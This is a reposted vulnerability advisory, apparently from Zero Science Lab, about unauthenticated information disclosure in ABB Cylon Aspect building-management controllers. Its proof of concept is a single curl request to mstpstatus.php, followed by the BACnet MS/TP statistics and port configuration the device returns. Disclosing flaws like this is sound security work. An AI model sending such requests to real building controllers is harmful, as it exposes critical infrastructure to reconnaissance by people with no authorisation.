{"id":60570,"date":"2024-12-03T02:30:16","date_gmt":"2024-12-02T23:30:16","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/182909\/ZSL-2024-5865.txt"},"modified":"2024-12-03T02:30:16","modified_gmt":"2024-12-02T23:30:16","slug":"abb-cylon-aspect-3-08-01-mstpstatus-php-information-disclosure","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/abb-cylon-aspect-3-08-01-mstpstatus-php-information-disclosure\/","title":{"rendered":"ABB Cylon Aspect 3.08.01 mstpstatus.php Information Disclosure"},"content":{"rendered":"<p>ABB Cylon Aspect 3.08.01 (mstpstatus.php) Information Disclosure<\/p>\n<p>Vendor: ABB Ltd.<br \/>Product web page: https:\/\/www.global.abb<br \/>Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio<br \/>Firmware: &lt;=3.08.01<\/p>\n<p>Summary: ASPECT is an award-winning scalable building energy management<br \/>and control solution designed to allow users seamless access to their<br \/>building data through standard building protocols including smart devices.<\/p>\n<p>Desc: The ABB BMS\/BAS controller suffers from an unauthenticated information<br \/>disclosure vulnerability. An unauthorized attacker can reference the affected<br \/>page and disclose various BACnet MS\/TP statistics running on the device.<\/p>\n<p>Tested on: GNU\/Linux 3.15.10 (armv7l)<br \/>GNU\/Linux 3.10.0 (x86_64)<br \/>GNU\/Linux 2.6.32 (x86_64)<br \/>Intel(R) Atom(TM) Processor E3930 @ 1.30GHz<br \/>Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz<br \/>PHP\/7.3.11<br \/>PHP\/5.6.30<br \/>PHP\/5.4.16<br \/>PHP\/4.4.8<br \/>PHP\/5.3.3<br \/>AspectFT Automation Application Server<br \/>lighttpd\/1.4.32<br \/>lighttpd\/1.4.18<br \/>Apache\/2.2.15 (CentOS)<br \/>OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)<br \/>OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)<\/p>\n<p>Vulnerability discovered by Gjoko &#8216;LiquidWorm&#8217; Krstic<br \/>@zeroscience<\/p>\n<p>Advisory ID: ZSL-2024-5865<br \/>Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2024-5865.php<\/p>\n<p>21.04.2024<\/p>\n<p>&#8212;<\/p>\n<p>$ cat project<\/p>\n<p>P R O J E C T<\/p>\n<p>.|<br \/>| |<br \/>|&#8217;| ._____<br \/>___ | | |. |&#8217; .&#8212;&#8220;|<br \/>_ .-&#8216; &#8216;-. | | .&#8211;&#8216;| || | _| |<br \/>.-&#8216;| _.| | || &#8216;-__ | | | || |<br \/>|&#8217; | |. | || | | | | || |<br \/>____| &#8216;-&#8216; &#8216; &#8220;&#8221; &#8216;-&#8216; &#8216;-.&#8217; &#8216;` |____<br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591<br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591 <br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2592\u2593\u2588\u2588\u2588\u2593\u2592\u2591<br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591<br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591<br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 <\/p>\n<p>$ curl http:\/\/192.168.73.31\/mstpstatus.php<br \/>Thu Nov 28 10:13:51 UTC 2024&lt;br&gt;&lt;div id=&#8217;Port 0Stat&#8217; class=&#8217;portStats&#8217;&gt;&lt;div id=&#8217;Port 0Load&#8217;&gt;Port 0 Load: 123 Average time (ms) to wait for token return<br \/>47 Average time (ms) to wait for for a reply<br \/>20 Max info frames<br \/>1063 Estimated time for max_nfo_frmaes tx plus token cycle (ms)<br \/>18 Estimated max rate (trasactions per sec)<br \/>38 congestion threashold<br \/>%&lt;\/div&gt;&lt;div id=&#8217;Port 0BPSTotal&#8217;&gt;Port 0 BPS (Total): &lt;\/div&gt;&lt;div id=&#8217;Port 0BPSOurs&#8217;&gt;Port 0 BPS (Mine): &lt;\/div&gt;&lt;\/div&gt;&lt;div id=&#8217;Port 1Stat&#8217; class=&#8217;portStats&#8217;&gt;&lt;div id=&#8217;Port 1Load&#8217;&gt;Port 1 Load: 34 Average time (ms) to wait for token return<br \/>40 Average time (ms) to wait for for a reply<br \/>20 Max info frames<br \/>834 Estimated time for max_nfo_frmaes tx plus token cycle (ms)<br \/>23 Estimated max rate (trasactions per sec)<br \/>48 congestion threashold<br \/>%&lt;\/div&gt;&lt;div id=&#8217;Port 1BPSTotal&#8217;&gt;Port 1 BPS (Total): &lt;\/div&gt;&lt;div id=&#8217;Port 1BPSOurs&#8217;&gt;Port 1 BPS (Mine): &lt;\/div&gt;&lt;\/div&gt;&lt;br \/&gt;<br \/>$Id: mstp.ko R_03_05_01 Thu Sep 23 09:30:32 EDT 2021 $ &lt;br \/&gt;<br \/>Proto: 0&lt;br \/&gt;<br \/>&lt;br \/&gt;<br \/>Port 0 Statistics =======================&lt;br \/&gt;<br \/>Baud Rate: 38400&lt;br \/&gt;<br \/>RX Characters: 60521&lt;br \/&gt;<br \/>RX echoes: 0&lt;br \/&gt;<br \/>RX Errors: 31&lt;br \/&gt;<br \/>TX Characters: 49671&lt;br \/&gt;<br \/>Echo detect fails: 0&lt;br \/&gt;<br \/>&lt;br \/&gt;<br \/>Port 0 MSTP State =======================&lt;br \/&gt;<br \/>ValidRXFrameCnt: 42320&lt;br \/&gt;<br \/>InvdRXFrameCnt: 61&lt;br \/&gt;<br \/>rxDataFrames: 16558&lt;br \/&gt;<br \/>rxToken: 29242&lt;br \/&gt;<br \/>TXFrameCnt: 2072&lt;br \/&gt;<br \/>TXQueCnt: 1&lt;br \/&gt;<br \/>CongestionCnt: 0&lt;br \/&gt;<br \/>Poll_Station: 0&lt;br \/&gt;<br \/>SoleMaster: FALSE&lt;br \/&gt;<br \/>&lt;br \/&gt;<br \/>Port 0 config =======================&lt;br \/&gt;<br \/>Nmax_master: 127&lt;br \/&gt;<br \/>Nmax_info_frames: 20&lt;br \/&gt;<br \/>This_Station: 0&lt;br \/&gt;<br \/>Tno_token: 500&lt;br \/&gt;<br \/>Tusage timeout 30&lt;br \/&gt;<br \/>congestion (auto): 38&lt;br \/&gt;<br \/>Npoll: 50&lt;br \/&gt;<br \/>&lt;br \/&gt;<br \/>&lt;br \/&gt;<br \/>Port 1 Statistics =======================&lt;br \/&gt;<br \/>Baud Rate: 38400&lt;br \/&gt;<br \/>RX Characters: 0&lt;br \/&gt;<br \/>RX echoes: 0&lt;br \/&gt;<br \/>RX Errors: 0&lt;br \/&gt;<br \/>TX Characters: 33632&lt;br \/&gt;<br \/>Echo detect fails: 0&lt;br \/&gt;<br \/>&lt;br \/&gt;<br \/>Port 1 MSTP State =======================&lt;br \/&gt;<br \/>ValidRXFrameCnt: 0&lt;br \/&gt;<br \/>InvdRXFrameCnt: 0&lt;br \/&gt;<br \/>rxDataFrames: 0&lt;br \/&gt;<br \/>rxToken: 0&lt;br \/&gt;<br \/>TXFrameCnt: 2&lt;br \/&gt;<br \/>TXQueCnt: 0&lt;br \/&gt;<br \/>CongestionCnt: 0&lt;br \/&gt;<br \/>Poll_Station: 29&lt;br \/&gt;<br \/>SoleMaster: TRUE&lt;br \/&gt;<br \/>&lt;br \/&gt;<br \/>Port 1 config =======================&lt;br \/&gt;<br \/>Nmax_master: 127&lt;br \/&gt;<br \/>Nmax_info_frames: 20&lt;br \/&gt;<br \/>This_Station: 0&lt;br \/&gt;<br \/>Tno_token: 500&lt;br \/&gt;<br \/>Tusage timeout 30&lt;br \/&gt;<br \/>congestion (auto): 48&lt;br \/&gt;<br \/>Npoll: 50&lt;br \/&gt;<br \/>&lt;br \/&gt;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>ABB Cylon Aspect 3.08.01 (mstpstatus.php) Information Disclosure Vendor: ABB Ltd.Product web page: https:\/\/www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-StudioFirmware: &lt;=3.08.01 Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices. Desc: The ABB BMS\/BAS controller suffers from &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-60570","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60570","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=60570"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60570\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=60570"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=60570"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=60570"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}